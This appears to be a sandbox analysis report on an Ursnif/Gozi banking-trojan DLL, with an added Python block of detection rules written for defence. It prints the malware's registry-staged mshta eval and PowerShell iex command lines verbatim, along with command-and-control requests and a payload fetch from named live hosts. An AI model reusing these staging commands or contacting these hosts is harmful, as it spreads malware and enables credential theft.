
Analysis Report NJPcHPuRcG.dll

Overview

General Information

Sample Name: NJPcHPuRcG.dll
Analysis ID: 353243
MD5: 48ac334e786156ef605b82dd563373f4
SHA1: 1710cf3539eaaf618a613e690157adf30550fade
SHA256: 71b928fd0b29e21bbfa4755b5347f4dc40653a82ec7ecf4947e325dbec23abaa
Tags: dll, Gozi, ISFB, Ursnif

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY in the browser (keeps traffic on plain HTTP/1.x so the bot's hooks can intercept it for web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6432 cmdline: loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll' MD5: 8081BC925DFC69D40463079233C90FA5)
    • regsvr32.exe (PID: 6448 cmdline: regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 6768 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 5052 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • cmd.exe (PID: 6456 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 6488 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6532 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6968 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
          • cvtres.exe (PID: 4192 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
        • iexplore.exe (PID: 1276 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 1752 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 4676 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5140 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5724 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1268 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6968 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "153", "system": "a271e0af49f6ad8f6473361d635135dbhh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613453205", "user": "1082ab698695dc15e71ab15cb0e88a2a", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp | GoziRule | Win32.Gozi | CCN-CERT
  • matched string at 0x8f0: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ... (UTF-16LE for "cookies.sqlite-j", a reference to the Firefox cookie store)
00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(5 of 9 matching memory dumps shown)

The leading index of each dump name is the process index used throughout the report: 00000002 is regsvr32.exe (PID 6448, the process in which the configuration was extracted), 00000019 is the powershell.exe child of mshta.exe, and 00000024 is explorer.exe, the injection target.

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started | Author: Joe Security
  Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
  CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
  CommandLine|base64offset|contains: zw
  Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessId: 5140
  ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
  ProcessId: 5724

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag
  Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
  ParentImage: C:\Windows\System32\mshta.exe
  ParentProcessId: 4676
  ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  ProcessId: 5140

Sigma detected: Suspicious Rundll32 Activity
Source: Process started | Author: juju4
  Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
  CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\System32\rundll32.exe
  NewProcessName: C:\Windows\System32\rundll32.exe
  OriginalFileName: C:\Windows\System32\rundll32.exe
  ParentCommandLine: C:\Windows\system32\control.exe -h
  ParentImage: C:\Windows\System32\control.exe
  ParentProcessId: 6768
  ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
  ProcessId: 5052
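The three Sigma matches above, together with the mshta.exe → powershell.exe → csc.exe chain in the Startup tree, can be reproduced over ordinary process-creation telemetry. The block below is an added example written for this page; it is not Joe Sandbox output and not the Sigma project's code. Its event records are constructed from the command lines in the process tree (Sysmon Event ID 1 field names), the first three rules are simplified paraphrases of the public Sigma rules the report names (the real rules carry longer selection lists), and registry_staged_script is this example's own rule for the pattern seen here: a script body stored in a registry value under HKCU\Software\AppDataLow is read back and handed to eval() in the HTA and to Invoke-Expression (iex) in PowerShell.

```python
"""Process-creation rules for the chain in this report (added example, not the report's code).

Event records are constructed from the 'Startup' process tree above, using the field
names of Sysmon Event ID 1 (Sigma's process_creation logsource). The first three rules
paraphrase the public Sigma rules the report names; registry_staged_script is this
example's own rule for "read a registry value, then eval/iex it".
"""
import re

EVENTS = [  # constructed from the process tree above (only the fields the rules need)
    {"ProcessId": 5052, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h",
     "ParentImage": r"C:\Windows\System32\control.exe", "ParentProcessId": 6768},
    {"ProcessId": 4676, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'",
     "ParentImage": None, "ParentProcessId": None},   # parent not recorded in the report
    {"ProcessId": 5140, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "ParentProcessId": 4676},
    {"ProcessId": 5724, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentProcessId": 5140},
    {"ProcessId": 6968, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentProcessId": 5140},
    {"ProcessId": 1268, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",  # negative control
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", "ParentProcessId": 5724},
]


def _image_is(path, *names):
    """Case-insensitive 'Image endswith' test; tolerates a missing parent."""
    return path is not None and path.lower().endswith(tuple(names))


def mshta_spawns_shell(e):
    """Sigma 'MSHTA Spawning Windows Shell' (paraphrased): mshta.exe parent, shell/LOLBin child."""
    return _image_is(e["ParentImage"], r"\mshta.exe") and _image_is(
        e["Image"], r"\cmd.exe", r"\powershell.exe", r"\pwsh.exe", r"\wscript.exe", r"\cscript.exe",
        r"\sh.exe", r"\bash.exe", r"\reg.exe", r"\regsvr32.exe", r"\bitsadmin.exe")


def dotnet_compiler_suspicious_location(e):
    """Sigma 'Dot net compiler compiles file from suspicious location' (paraphrased)."""
    return _image_is(e["Image"], r"\csc.exe", r"\vbc.exe") and re.search(
        r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|\\Temporary Internet Files\\|\\Users\\Public\\",
        e["CommandLine"], re.I) is not None


def suspicious_rundll32(e):
    """Sigma 'Suspicious Rundll32 Activity' (paraphrased): well-known proxy-execution entry points."""
    return _image_is(e["Image"], r"\rundll32.exe") and re.search(
        r"shell32\.dll,control_rundll|javascript:|url\.dll,(fileprotocolhandler|openurl)|zipfldr\.dll,routethecall",
        e["CommandLine"], re.I) is not None


def registry_staged_script(e):
    """This example's rule: one command line both reads a registry value and evaluates it."""
    cl = e["CommandLine"]
    reads_registry = re.search(r"""\.regread\(|Get-ItemProperty|\bgp\s+['"]?HK""", cl, re.I)
    evaluates = re.search(r"\beval\(|\biex\b|Invoke-Expression", cl, re.I)
    return bool(reads_registry and evaluates)


RULES = {f.__name__: f for f in (mshta_spawns_shell, dotnet_compiler_suspicious_location,
                                  suspicious_rundll32, registry_staged_script)}


def evaluate(events=EVENTS):
    """Sorted (rule, image basename, pid) findings. PIDs are recycled within a trace (6968 is
    both an iexplore.exe and a csc.exe in this report), so key on image+pid, never pid alone."""
    return sorted((name, e["Image"].rsplit("\\", 1)[-1].lower(), e["ProcessId"])
                  for e in events for name, rule in RULES.items() if rule(e))


if __name__ == "__main__":
    for rule, image, pid in evaluate():
        print(f"{rule:36} {image:16} pid={pid}")
```

Run stand-alone, it lists six findings: both csc.exe compilations out of %TEMP% (the report's Sigma section shows only the first), the powershell.exe child of mshta.exe, the rundll32 Control_RunDLL proxy, and the two registry-staged script launches; the cvtres.exe record, which also writes to %TEMP%, is correctly not flagged because the compiler rule is keyed on csc.exe/vbc.exe.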

Signature Overview

AV Detection:

Found malware configuration
Source: regsvr32.exe.6448.2.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "153", "system": "a271e0af49f6ad8f6473361d635135dbhh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613453205", "user": "1082ab698695dc15e71ab15cb0e88a2a", "hash": "0xf857f57e", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: NJPcHPuRcG.dll | VirusTotal: Detection: 15%

Compliance:

Uses 32bit PE files
Source: NJPcHPuRcG.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49750 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' | source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb | source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP | source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb | source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
(Note: the first hit is csc.exe's own length-prefixed message table, matched on the ".pdb extension" wording of its /pdb option help, and the remaining hits are the ntdll and wscui symbol names of Windows modules in the sandbox processes; none of them is a debug-symbol path belonging to the submitted DLL.)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_054016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: Joe Sandbox View | IP Address: 104.20.184.68 104.20.184.68
Source: Joe Sandbox View | JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic | HTTP traffic detected: GET /api1/QSqnACLeyr6hdgRM/z5FskeEfxxW4Q1R/GsITkxgk46HCnUm5Kd/11eB4QB_2/FS2OIfou_2BVahhCN2i1/lN05g44fSdWuZ34SVM_/2F18tQh3ZP_2B9CZltVRIM/NAJawsHjH4mX4/XILaVciO/5e8TUIFZ7ccd8Dn_2F8wtDN/DA_2BihyHs/BqbIiQ7x5yFYJOUsg/scHsHuDvL_2F/a38zFWCcfG3/xo4sCKeZx_2FgB/qzrd3KTzhXtd1iKJfTVBW/TIaj2x4Rf3CB0n8w/wlBMav7PHwJXLsZ/IliJcWNYhk60Yrdjmm/3OHtbL5dY/ANYcc2W_2Bf_2FIiYenV/jXNvqJX5m02G5/F HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm6BSIFzHirA83QDIG_/2FbmOJUxF8/ud5_2Fql9hZq1SzAT/Mwor9Yan0pTL/Fp7ZNYW1P4i/kA3p_2Ft9A_2Fs/RuUNpyL5CsQBX14_2BDvT/1fDvmlCtb0dss45p/clOsmGOkIAiGzqR/LxhkYHtCoZLc014ID_/2BtL4MOOe/oIJGNpJMiO7LF1VXD1cY/3TSy0R_2FzpOndwhSFh/jEmLA5uqXYEdrQwipf8a_2/FYxkdf4zOPfe0/vr4tnHHd/_2Fh2Azy7z8mKYRQWXwGF6y/SDOEEBL HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/AV8RjqvumRQ/OvLh7PdTNMKGa7/3LP4_2BG3LRcoZojWSk5u/NsORJjPn_2Fv_2B1/6Rz2NQs3_2FAyK6/XQQdYcU_2Fse_2F2j3/Zr9Hx_2Ba/98olXIGwinJCl_2FG4zm/M7DRWkrkSQ3KxF_2B9c/y19JwEmq4VBfpQCfptESLl/3GITd_2BqQxr2/SZAx9P1V/YikBhoAaQcpPJtcNJcJIY1_/2BjEuQfwCu/DUjEswX2uyguNEfAU/ZGf5P4bm4kOR/ZxxrQAreiF2/UPHWjC6fJcwkvj/jLEwRcMGH9odoyp8GuEAA/_2BQntTJU4ER5IW5/BN_2BQxL/y8vbI87 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 | Host: api3.lepini.at
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
